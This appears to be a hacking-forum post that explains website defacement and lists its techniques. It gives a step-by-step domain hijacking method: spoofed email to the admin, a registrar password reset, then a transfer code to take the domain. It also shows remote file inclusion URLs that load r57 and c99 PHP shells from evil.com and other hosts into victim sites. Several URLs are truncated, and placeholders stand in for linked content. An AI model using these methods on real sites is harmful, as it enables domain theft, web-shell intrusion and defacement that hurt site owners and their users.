1). What is Website defacement ?
A website defacement is an attack on a website that changes the visual
appearance of the site. These are typically the work of system crackers, who break
into a web server and replace the hosted website with one of their own.
A high-profile website defacement was carried out on the website of the company
SCO Group following its assertion that Linux contained stolen code. The title of
the page was changed from "Red Hat vs SCO" to "SCO vs World," with various
satirical content following
2). Terms to be used ---->
[SQL] - Structured Query Language
[LFI] - Local File Include
[RFI] - Remote File Include
[XSS] - Cross Site Scripting
[RCE] - Remote Code Execution
[AFD] - Arbitrary File Download
[SCD] - Source Code Disclosure
[PCI] - PHP Code Injection
3). Defacement techniques ?
I).Domain Hacking
II).FTP Protokol
III).Apache Vulnerable
IV).Script, Cookie, XSS
V).Social Engineer
VI).SQL Injection
VII).RFI.
4).Tools for web defacement ?
Now :-
I).What is Domain Hacking ?
A Domain hacking is a process to transfer domain(yahoo.com) without owner permission
with help of phishing, sniffing,spoofing.
A domain hack is an unconventional domain name that combines domain levels,
especially the top-level domain (TLD), to spell out the full "name" or title of the domain,
making a kind of fun.
------->Domain Hacking process :--->
a). See who.is record of victim(XXABCXX.net) DNS record and note down
admin email (xxabcxx@gmail/ymail/hotmail/live/[whatever apply this exception if possible admin(name)@XXABCXX.net]
)b). Send spoof mail to victim admin email for password.
c). after open domain registrar ---->(my.indialinks.com) <-----------website to access
their domain control panel (click forget password)
Must read (Click to View)
e). Just login on domain control panel.
f). and get ECCP code and create new account on hosting company
and choose Domain transfer (all submit all details)
g). You will get all rights on this domain for lifetime.
II).What is FTP Protocol ?
The File Transfer Protocol (FTP) provides the basic elements of file sharing between hosts. FTP uses TCP to create a virtual connection for control information and then creates a separate TCP connection for data transfers. The control connection uses an image of the TELNET protocol to exchange commands and messages between hosts.
for detail check this link
Detail about FTP
III).What is Apache vulnerables ?
You can check this if you want cause i don't like it and is weird for me too.So was feeling lazy to post it in detail
sorry for this
To know about this click here (Click to View)
XSS is a type of computer security vulnerability typically found in web applications
which allow code injection by malicious web users into the web pages viewed by
other users.
Cross Site Scripting is a technique used to add script to a trusted site that will be executed
on other users browsers. A key element to XSS is that one user can submit data to a
website that will later be displayed for other users. It is nessesary that the bad guy NOT
mess up the HTML structure, otherwise the result will be web defacement rather then
attacking other users.
for this we have one tutorial in forum can check here (Click to View)
V).What is Social Engineering ?
Social engineering is the act of manipulating people into doing actions or exposing confidential information. It's trickery or deception to gather information, fraud, or computer system access where in the hacker never comes face-to-face with the victim. Here are some of the social engineering techniques:
I don't want to make my thread so big in size so i helped myself by this and posted more detail in spoiler click below
click me (Click to View)
VI).What is SQL injection ?
SQL injection is a type of security exploit in which the attacker injects Structured Query
Language (SQL) code through a web form input box, to gain access to resources, or make
changes to data.
It is a technique of injecting SQL commands to exploit non-validated input
vulnerabilities in a web application database.
-------------->Preventing SQL Injection<-------------------
To protect against SQL injection, user input must not directly be embedded in
SQL statements. Instead, parameterized statements must be used (preferred), or
user input must be carefully escaped or filtered.
VII).What is RFI ?
Remote File Inclusion attacks allow malicious users to run their own PHP
code on a vulnerable website. The attacker is allowed to include his own
(malicious) code in the space provided for PHP programs on a web page.
For E.g, :-
a piece of vulnerable PHP code would look like this:
http://www.victimsite.com/index.php?ROOT...om/r57.txt
http://www.victimsite.com/index.php?geti.../shell.txt
One thing we need remember
http://www.site.com/run.php?file=www.evil.com/evil.php //will execute the php on EVIL site
http://www.site.com/run.php?file=www.evil.com/evil.txt //will execute the php on VICTIM's
site site.
http://www.23net.tv//modules/xfsection/m...h.iespana.
es/Shell/r57.txt???? 2005
http://paulyorke.com/index.php?p=http://...ox.com.ar/[c]/c99shell.txt? 2005
------------>Preventing RFI Vulnerability<------------
For this what i know is you have to download RFI scanner so google it and find it. I am sure you will find it and if you could not find it than ask me i will get it for you.But do give a try by yourself first.
Thanks
Thanks to wikipedia, google and few sites that helped me in creating this thread.[/color]
If Anything more needs to be added here please suggest.It will be appreciated.
0 comments:
Post a Comment